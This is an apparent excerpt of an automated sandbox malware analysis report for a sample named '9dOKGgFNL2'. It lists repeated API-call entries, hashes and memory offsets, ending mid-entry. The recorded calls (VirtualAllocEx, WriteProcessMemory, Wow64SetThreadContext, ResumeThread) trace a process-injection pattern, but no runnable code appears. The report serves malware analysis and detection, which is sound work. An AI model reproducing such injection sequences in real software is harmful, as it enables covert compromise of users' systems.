                                                                                                                                              control_flow_graph 996 6592738-659278c 998 659278e-6592794 996->998 999 6592797-65927a6 996->999 998->999 1000 65927a8 999->1000 1001 65927ab-65927e4 DrawTextExW 999->1001 1000->1001 1002 65927ed-659280a 1001->1002 1003 65927e6-65927ec 1001->1003 1003->1002
                                                                                                                                              APIs
                                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 065927D7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DrawText
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 2175133113-4160683662
                                                                                                                                              • Opcode ID: 75232f7c3e16ef0f1f63cc1f869681efab38f0b711254d1c3507d2406e6b3644
                                                                                                                                              • Instruction ID: 172b89af59a21bc8489ac09695cf8431808bb6d5119e64ad21af1b9c2ba8a2e5
                                                                                                                                              • Opcode Fuzzy Hash: 75232f7c3e16ef0f1f63cc1f869681efab38f0b711254d1c3507d2406e6b3644
                                                                                                                                              • Instruction Fuzzy Hash: 7F31D1B5D01249AFDB10CF9AD880ADEBFF9BB48320F14842AE819A7210D775A544CFA0
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D76010
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 3559483778-4160683662
                                                                                                                                              • Opcode ID: 1fd55aafb8bb999c7be42b8f01465a27526599272cb6ea31c6f4f6d05c70e956
                                                                                                                                              • Instruction ID: 083aff7f3231cb41f73ee772312d807accd9e3a0eb0cd3946bc8c92abbdadbd4
                                                                                                                                              • Opcode Fuzzy Hash: 1fd55aafb8bb999c7be42b8f01465a27526599272cb6ea31c6f4f6d05c70e956
                                                                                                                                              • Instruction Fuzzy Hash: BA212AB5900349DFCB10CFA9C881BDEBBF5FF48324F10842AE919A7240D7799950DBA5
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D75E66
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 983334009-4160683662
                                                                                                                                              • Opcode ID: 05c8846f79630742038da1f77ca7e7194b0458023176f86ad70914db23321e41
                                                                                                                                              • Instruction ID: a41d01dbb950bb1a51e86481dfd723bd9bcb080ded8b51b19676ed6d3cbfd9d3
                                                                                                                                              • Opcode Fuzzy Hash: 05c8846f79630742038da1f77ca7e7194b0458023176f86ad70914db23321e41
                                                                                                                                              • Instruction Fuzzy Hash: C42139B1D003099FDB10DFAAD4857EEFBF4EF48324F14842AD519A7240D7799945CBA1
                                                                                                                                              APIs
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D760F0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 1726664587-4160683662
                                                                                                                                              • Opcode ID: 7964bb3c6b16f814346f1d2ed9a20f4400c5d24939d1969e869f9df4e9ba7aaf
                                                                                                                                              • Instruction ID: 97acf5dd2649dc98f858b7b357ca75834c82e81fd7eb9619b498c3b68db263fe
                                                                                                                                              • Opcode Fuzzy Hash: 7964bb3c6b16f814346f1d2ed9a20f4400c5d24939d1969e869f9df4e9ba7aaf
                                                                                                                                              • Instruction Fuzzy Hash: 4A2119B59013599FCB10DFAAD881BEEFBF5FF48320F10842AE919A7240D7759540DBA1
                                                                                                                                              APIs
                                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 065927D7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DrawText
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 2175133113-4160683662
                                                                                                                                              • Opcode ID: f21110012edbdc47b3dd86b66f36d71e1450ec0654c2c06440ca3fac35f4f20e
                                                                                                                                              • Instruction ID: 96928b5321cd479a86ba3f0618a14956db909bd85e229d781e3e75ebda9de640
                                                                                                                                              • Opcode Fuzzy Hash: f21110012edbdc47b3dd86b66f36d71e1450ec0654c2c06440ca3fac35f4f20e
                                                                                                                                              • Instruction Fuzzy Hash: 2621C3B5D002099FDB10CF9AD880A9EFBF5FF58320F14842AE819A7210D775A544CFA0
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D76010
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 3559483778-4160683662
                                                                                                                                              • Opcode ID: ceab32c7fa1732af4c41e1cafc86969152d1bdb8ef50b3ce64160ad19487f174
                                                                                                                                              • Instruction ID: 3ffbacba3a8ca87af45bc89baeaa8224adce483249ae46cb00ffccae928e30de
                                                                                                                                              • Opcode Fuzzy Hash: ceab32c7fa1732af4c41e1cafc86969152d1bdb8ef50b3ce64160ad19487f174
                                                                                                                                              • Instruction Fuzzy Hash: 222125B5900309DFCB10CFAAC881BDEBBF5FF48320F10842AE919A7240D7799950DBA1
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031FD82F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 3793708945-4160683662
                                                                                                                                              • Opcode ID: f9df60e890d8e68684b5b8e2654b408a61f63b24c43a0c974f2d9c01b566b4f7
                                                                                                                                              • Instruction ID: 2d44d913b27a978f95d00a4b98d292218b6aa1c8e7ef0f70a8266755d8ac9217
                                                                                                                                              • Opcode Fuzzy Hash: f9df60e890d8e68684b5b8e2654b408a61f63b24c43a0c974f2d9c01b566b4f7
                                                                                                                                              • Instruction Fuzzy Hash: 8B21D4B59002099FDB10CF9AD585ADEBBF4EB48310F14845AE918A7310D374A950CFA1
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D75E66
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 983334009-4160683662
                                                                                                                                              • Opcode ID: b970eada01b00b424ef6c46492516a9c90e7451ee5df5deaed734cd9344af92c
                                                                                                                                              • Instruction ID: 26327090beb3ee4194e3402498b40f4c1237f2b0a96605c4cdb6a712ac465ae0
                                                                                                                                              • Opcode Fuzzy Hash: b970eada01b00b424ef6c46492516a9c90e7451ee5df5deaed734cd9344af92c
                                                                                                                                              • Instruction Fuzzy Hash: CF2118B1D003098FDB10DFAAC4857AEFBF4EF48324F14842AD519A7240D7789944CFA1
                                                                                                                                              APIs
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D760F0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 1726664587-4160683662
                                                                                                                                              • Opcode ID: a917416a5d08bb1e6ba7014d0cac74a1f5c678a4be2d604a022329e8ba826988
                                                                                                                                              • Instruction ID: 2c9bbcf3e71e3b6af7dc3010d4864e538a5bc1d23058585ee9ba49da4d90e2f3
                                                                                                                                              • Opcode Fuzzy Hash: a917416a5d08bb1e6ba7014d0cac74a1f5c678a4be2d604a022329e8ba826988
                                                                                                                                              • Instruction Fuzzy Hash: 822116B19002599FCB10CFAAC881ADEFBF5FF48320F10842AE919A7240D7799500DBA1
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031FD82F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 3793708945-4160683662
                                                                                                                                              • Opcode ID: d8d1fbefcebcf4524671c8cbf732626032e436a22f61c184ede3fd4c0a14e7ad
                                                                                                                                              • Instruction ID: e921543fa399d280b1347aec10b7b6784010cdbd75c08c1f63ea21d9fea78a73
                                                                                                                                              • Opcode Fuzzy Hash: d8d1fbefcebcf4524671c8cbf732626032e436a22f61c184ede3fd4c0a14e7ad
                                                                                                                                              • Instruction Fuzzy Hash: 8F21E3B59002089FDB10CFAAD984ADEBBF8EB48320F14801AE918A3310D374A940CFA1
                                                                                                                                              APIs
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D75F2E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 4275171209-4160683662
                                                                                                                                              • Opcode ID: f2d6aed457a3e8edb56837efaf9227736e18077e821d373960e1453635a1a399
                                                                                                                                              • Instruction ID: 2a191b6ec6c5415aa81a70899e73f8d4fa64857baa969ecff26317773e14a6c4
                                                                                                                                              • Opcode Fuzzy Hash: f2d6aed457a3e8edb56837efaf9227736e18077e821d373960e1453635a1a399
                                                                                                                                              • Instruction Fuzzy Hash: 00118CB68002499FCB20DFAAD845BEFFFF9EF48324F20841AE519A7250C7759500DBA1
                                                                                                                                              APIs
                                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06593F0A,?,?,?,?,?), ref: 06593FAF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 3668623891-4160683662
                                                                                                                                              • Opcode ID: 4e83e2d8d324eac72534b660be68974276caa7d68ef68dce8876e41e4c97a422
                                                                                                                                              • Instruction ID: 65fd355886977ab21e1cc5fa564ca8c1e05f470326a1bc17f55874de583343c0
                                                                                                                                              • Opcode Fuzzy Hash: 4e83e2d8d324eac72534b660be68974276caa7d68ef68dce8876e41e4c97a422
                                                                                                                                              • Instruction Fuzzy Hash: 9F1129B5800249DFDB10CF9AC845BDEBFF8EB48324F14845AE954A7210C379A954DFA5
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 947044025-4160683662
                                                                                                                                              • Opcode ID: d6208b259a31b01c47fa869dcf5409a6e0c2e76b6cd33708c8cce75073f4c242
                                                                                                                                              • Instruction ID: 3161bc4b20dbb36c3ac6f5e7314f9a6546d32f3ec2e6d46eea92d64ceb290a7a
                                                                                                                                              • Opcode Fuzzy Hash: d6208b259a31b01c47fa869dcf5409a6e0c2e76b6cd33708c8cce75073f4c242
                                                                                                                                              • Instruction Fuzzy Hash: 7D1149B59003498BDB20DFAAD8457EEFBF8EB88324F24841AD519A7240CB75A540CBA1
                                                                                                                                              APIs
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D75F2E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 4275171209-4160683662
                                                                                                                                              • Opcode ID: d59daa9eccd9585eabe8314d511294785603aebd90f16618ddf79b8f6123677a
                                                                                                                                              • Instruction ID: 01f9c5d17ada0f31a8224497628de53cddaa040991fcee9ce5246835da72fca8
                                                                                                                                              • Opcode Fuzzy Hash: d59daa9eccd9585eabe8314d511294785603aebd90f16618ddf79b8f6123677a
                                                                                                                                              • Instruction Fuzzy Hash: 661156B19002099FCB20DFAAC845BDEFBF5EF88324F20841AE519A7250C775A510DBA1
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 947044025-4160683662
                                                                                                                                              • Opcode ID: bb32e20ed7eaa6cac4d6831f78914c48cb9a2feebf8cb1427143948315e37a27
                                                                                                                                              • Instruction ID: 47c06aeec1ba90e4d692e8b39a9a7bc065a6a6f2a22216e1fa3a4acc6455fb79
                                                                                                                                              • Opcode Fuzzy Hash: bb32e20ed7eaa6cac4d6831f78914c48cb9a2feebf8cb1427143948315e37a27
                                                                                                                                              • Instruction Fuzzy Hash: E4113AB1D003498FDB20DFAAD4457AEFBF5EF88324F24841AD519A7340C775A544CB91
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D78AB5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 410705778-4160683662
                                                                                                                                              • Opcode ID: aa0da771c313a41028ba9a73e810cdcaa6465e11ef9635d724a152730958c09b
                                                                                                                                              • Instruction ID: 5d2850a7d8ef8e728ed13f94745c08b6e74a71b5aa5493b6ab6d879d89e7edbd
                                                                                                                                              • Opcode Fuzzy Hash: aa0da771c313a41028ba9a73e810cdcaa6465e11ef9635d724a152730958c09b
                                                                                                                                              • Instruction Fuzzy Hash: A311E3B5800349DFDB20CF99D585BDEFBF8EB58324F24845AD558A7240C375A544CFA1
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 031FB11E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 4139908857-4160683662
                                                                                                                                              • Opcode ID: e17028d9ef33532f23a5a6c64834fcea115e8e810de7f907eaa04cd0f3290347
                                                                                                                                              • Instruction ID: 138f58771881b3c8da14516d3689fabfe646c3b9d5f70f78832d9c3b511608d3
                                                                                                                                              • Opcode Fuzzy Hash: e17028d9ef33532f23a5a6c64834fcea115e8e810de7f907eaa04cd0f3290347
                                                                                                                                              • Instruction Fuzzy Hash: 121110B5C042498FCB20DF9AD844BDEFBF4EF88324F24841AD929A7200C379A545CFA1
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D78AB5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 410705778-4160683662
                                                                                                                                              • Opcode ID: 5953f70efe749d8806ac8f23cec338d06277acc0251aad89cd77ee750347ffec
                                                                                                                                              • Instruction ID: dd1c1f811858dfa2dcb95de7878a57a9a75242b8424a3437f19f5d2597e68377
                                                                                                                                              • Opcode Fuzzy Hash: 5953f70efe749d8806ac8f23cec338d06277acc0251aad89cd77ee750347ffec
                                                                                                                                              • Instruction Fuzzy Hash: D211E3B5800349DFDB10DF99C589BDEFBF8EB48324F20845AE518A7200D375A944CFA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1739953630.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_166d000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ba10621d166512b86a0d1e00787a7e710cd85a2f6021cb736e53ad1982f3e5d3
                                                                                                                                              • Instruction ID: 29120aaa3c96afa93c8bf8919a292d669157ab225f8e70d9537af5594239068e
                                                                                                                                              • Opcode Fuzzy Hash: ba10621d166512b86a0d1e00787a7e710cd85a2f6021cb736e53ad1982f3e5d3
                                                                                                                                              • Instruction Fuzzy Hash: 072136B1204244EFDB05DF48C9C0B66BF69FB98324F24C569E94A4B256C336E846CAA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1739994212.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_167d000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bfe15b3d2dba38c64ae0f8a2f1a17dd687e5c0d723e9e35a5a2c06d087bade66
                                                                                                                                              • Instruction ID: 8300481b4b9dcff0fed0f3113a8040ba1b115c8cba1f24e575873b50dcc83ffa
                                                                                                                                              • Opcode Fuzzy Hash: bfe15b3d2dba38c64ae0f8a2f1a17dd687e5c0d723e9e35a5a2c06d087bade66
                                                                                                                                              • Instruction Fuzzy Hash: 6B2104B1604200EFDB05DF98D9C0B26BBA5FF84324F24C9ADEA4A4B356C336D447CA61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1739994212.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_167d000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e89d7d4009656d8957d38fcfe75965fc59b4fef236d858eda1fa885feb051da0
                                                                                                                                              • Instruction ID: 319868f7ea67fd561be2a90cb1ea0d7ed9bfe82b74a2b2fb4ddea4d92c9babb2
                                                                                                                                              • Opcode Fuzzy Hash: e89d7d4009656d8957d38fcfe75965fc59b4fef236d858eda1fa885feb051da0
                                                                                                                                              • Instruction Fuzzy Hash: 2621D0B5604200DFDB16DF68D9C0B26BB65EF84354F24C96DE90A4B396C33AD447CA61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1739953630.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_166d000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                              • Instruction ID: 74ea317fa38ae972ece973f30b441cd2cad2cbe3f5d47e1c7c66d48d17d36a14
                                                                                                                                              • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                              • Instruction Fuzzy Hash: A011DF72504240DFDB12CF44D9C0B56BF72FB84324F24C2A9D9494B656C33AE85ACBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1739994212.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_167d000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                              • Instruction ID: 5b9f273745b3af4711916aac4b31f29673be2b82e045380da6ddb91cff0829bb
                                                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                              • Instruction Fuzzy Hash: 5311BE75504280CFDB12CF54D9C4B15BB62FB44314F24CAAAD8094B756C33AD44ACB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1739994212.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_167d000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                              • Instruction ID: 2d74189fd4a1263098308208c3639a67222d4a0953461c10e171d61c6953a30c
                                                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                              • Instruction Fuzzy Hash: C211BB75504280DFDB12CF54C9C0B15BFA2FF84224F28CAAAD9494B796C33AD44ACB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1739953630.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_166d000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: db0ae6916a6d98d5cf02345c041baa4d05af2160ed6a12ea40bfd6e56ab4155a
                                                                                                                                              • Instruction ID: f8f24876778a302248df61c4b4b7499675fbe362a4208d065c0e41b59d30e9d3
                                                                                                                                              • Opcode Fuzzy Hash: db0ae6916a6d98d5cf02345c041baa4d05af2160ed6a12ea40bfd6e56ab4155a
                                                                                                                                              • Instruction Fuzzy Hash: D9012B712043809AE7104EA9DDC4B37BF9CDF41364F18C55AED484A282C73D9841CBB2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1739953630.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_166d000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 56d221f8e5e56047ccb8581d273b327bd2eee2fce65fc272f35fdba920e8d374
                                                                                                                                              • Instruction ID: 3d83536bbfe6c24b3710eb096601fe6430036835a090ecab82eca8a02388da0c
                                                                                                                                              • Opcode Fuzzy Hash: 56d221f8e5e56047ccb8581d273b327bd2eee2fce65fc272f35fdba920e8d374
                                                                                                                                              • Instruction Fuzzy Hash: E1F0C2715043809BE7108E19DCC4B62FF9CEB41234F18C05AED484A286C379A840CBB1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: abed61a4c1853b49b5d3aa1902310bb37fa9c69f43e902908a05cfcbc37a31b1
                                                                                                                                              • Instruction ID: a88b5e18b3feb52fa36da963ce45694e0aa6ceb683c339876d3c978da4226596
                                                                                                                                              • Opcode Fuzzy Hash: abed61a4c1853b49b5d3aa1902310bb37fa9c69f43e902908a05cfcbc37a31b1
                                                                                                                                              • Instruction Fuzzy Hash: 49E119B4E042598FCB14CFA9C5809AEFBB6FF89300F248169E455AB355D731AD82CF60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
